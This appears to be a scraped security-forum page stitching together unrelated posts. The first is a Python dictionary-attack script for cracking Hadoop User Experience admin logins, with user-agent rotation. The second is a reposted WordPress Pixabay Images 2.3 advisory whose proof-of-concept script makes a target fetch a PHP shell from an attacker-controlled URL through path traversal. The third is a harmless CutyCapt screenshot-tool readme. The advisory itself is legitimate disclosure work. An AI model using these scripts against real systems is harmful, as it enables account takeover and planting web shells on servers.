Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/pythonimport sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source
-
WordPress Pixarbay Images 2.3 XSS / Bypass / Upload / Traversal
Aerosol posted a topic in Exploituri
Mogwai Security Advisory MSA-2015-01 ---------------------------------------------------------------------- Title: WP Pixarbay Images Multiple Vulnerabilities Product: Pixarbay Images (Wordpress Plugin) Affected versions: 2.3 Impact: high Remote: yes Product link: https://wordpress.org/plugins/pixabay-images/ Reported: 14/01/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- Pixabay Images is a WordPress plugin that let's you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required. Business recommendation: ---------------------------------------------------------------------- Update to version 2.4 Vulnerability description: ---------------------------------------------------------------------- 1) Authentication bypass The plugin does not correctly check if the user is logged in. Certain code can be called without authentication 2) Arbitrary file upload The plugin code does not validate the host in the provided download URL, which allows to upload malicious files, including PHP code. 3) Path Traversal Certain values are not sanitized before they are used in a file operation. This allows to store files outside of the "download" folder. 4) Cross Site Scripting (XSS) The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks. Proof of concept: ---------------------------------------------------------------------- The following PoC Python script can be used to download PHP files from a attacker controlled host. #!/usr/bin/env python import argparse import httplib, urllib from urlparse import urlparse def exploit(target_url, shellcode_url): target = urlparse(target_url) params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url, 'image_user': 'none', 'q':'xxx/../../../../../../mogwai'}) headers = headers = {"Content-type": "application/x-www-form-urlencoded"} print "[+] Sending download request...." conn = httplib.HTTPConnection(target.netloc) conn.request("POST", target.path + "/wp-admin/", params, headers) response = conn.getresponse() response_data = response.read() if response.status != 200 and response_data != "Error: File attachment metadata error": print "[-] Something went wrong" print response_data exit() conn.close() # ---- Main code ---------------- parser = argparse.ArgumentParser() parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/") parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php") print "----------------------------------------------" print " pixabay upload wordpress plugin exploit PoC" print " Mogwai security" print "----------------------------------------------" arguments = parser.parse_args() exploit(arguments.target_url, arguments.shellcode_url) Vulnerable / tested versions: ---------------------------------------------------------------------- Pixabay Images 2.3 Disclosure timeline: ---------------------------------------------------------------------- 14/01/2014: Reporting issues to the plugin author 15/01/2014: Release of fixed version (2.4) 19/01/2014: Public advisory Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source -
CutyCapt CutyCapt is a small cross-platform command-line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP. See IECapt for a similar tool based on Internet Explorer. Samples Here are some samples of CutyCapt generated renderings: PNG Snapshot of http://digg.com PNG Snapshot of css Zen Garden: The Beauty in CSS Design SVG Snapshot of MSDN Silverlight Dev Center PDF Snapshot of MSDN Silverlight Dev Center Status CutyCapt has a number of known quirks, most of which are caused by problems with Qt and/or WebKit. For example, while plugin support can be enabled, and the plugins execute properly, their rendering cannot be captured on some platforms. Use of with caution. Requirements CutyCapt depends on Qt 4.4.0+. Download Help wanted! Previously I have used MinGW to make a static Qt build and correspondingly single-file CutyCapt executables for Windows. However, MinGW no longer supports single-file executables for threaded applications, they require to re-distribute a DLL instead, and Qt no longer supports static builds of QtWebkit. Similarily, if I just used Visual Studio 2010, as I do for normal development, proper builds would have to redistribute Microsoft runtime DLLs. Anyone who wants to prepare CutyCapt.exe + *.DLL builds is most welcome to join the project to do so, or alternatively provide them externally which I would then link from here. Let me know if you are interested. Thanks. CutyCapt-Win32-2010-04-26.zip (7MB, .exe for Win32 systems) CutyCapt-Win32-2008-06-11.zip (6MB, .exe for Win32 systems) Source code The source code is available in the SVN repositorty(download tarball). Usage Open a command prompt and ask for help: % CutyCapt --help ----------------------------------------------------------------------------- Usage: CutyCapt --url=http://www.example.org/ --out=localfile.png ----------------------------------------------------------------------------- --help Print this help page and exit --url=<url> The URL to capture (http:...|file:...|...) --out=<path> The target file (.png|pdf|ps|svg|jpeg|...) --out-format=<f> Like extension in --out, overrides heuristic --min-width=<int> Minimal width for the image (default: 800) --min-height=<int> Minimal height for the image (default: 600) --max-wait=<ms> Don't wait more than (default: 90000, inf: 0) --delay=<ms> After successful load, wait (default: 0) --user-styles=<url> Location of user style sheet, if any --header=<name>:<value> request header; repeatable; some can't be set --method=<get|post|put> Specifies the request method (default: get) --body-string=<string> Unencoded request body (default: none) --body-base64=<base64> Base64-encoded request body (default: none) --app-name=<name> appName used in User-Agent; default is none --app-version=<version> appVers used in User-Agent; default is none --user-agent=<string> Override the User-Agent header Qt would set --javascript=<on|off> JavaScript execution (default: on) --java=<on|off> Java execution (default: unknown) --plugins=<on|off> Plugin execution (default: unknown) --private-browsing=<on|off> Private browsing (default: unknown) --auto-load-images=<on|off> Automatic image loading (default: on) --js-can-open-windows=<on|off> Script can open windows? (default: unknown) --js-can-access-clipboard=<on|off> Script clipboard privs (default: unknown) --print-backgrounds=<on|off> Backgrounds in PDF/PS output (default: off) ----------------------------------------------------------------------------- <f> is svg,ps,pdf,itext,html,rtree,png,jpeg,mng,tiff,gif,bmp,ppm,xbm,xpm ----------------------------------------------------------------------------- Build Instructions If your system is set up to compile Qt applications, building CutyCapt should be a simple matter of checking out the source code and running qmake and your version of make. As an example, if you are running Ubuntu Hardy Heron and have configured the system to use packages from hardy-backports, the following should do: % sudo apt-get install subversion libqt4-webkit libqt4-dev g++ % svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt % cd cutycapt/CutyCapt % qmake % make % ./CutyCapt --url=http://www.example.org --out=example.png Using CutyCapt without X server You cannot use CutyCapt without an X server, but you can use e.g. Xvfb as light-weight server if you are not running an interactive graphical desktop environment. For example, you could use: % xvfb-run --server-args="-screen 0, 1024x768x24" ./CutyCapt --url=... --out=... Author Björn Höhrmann bjoern@hoehrmann.de CutyCapt - A Qt WebKit Web Page Rendering Capture Utility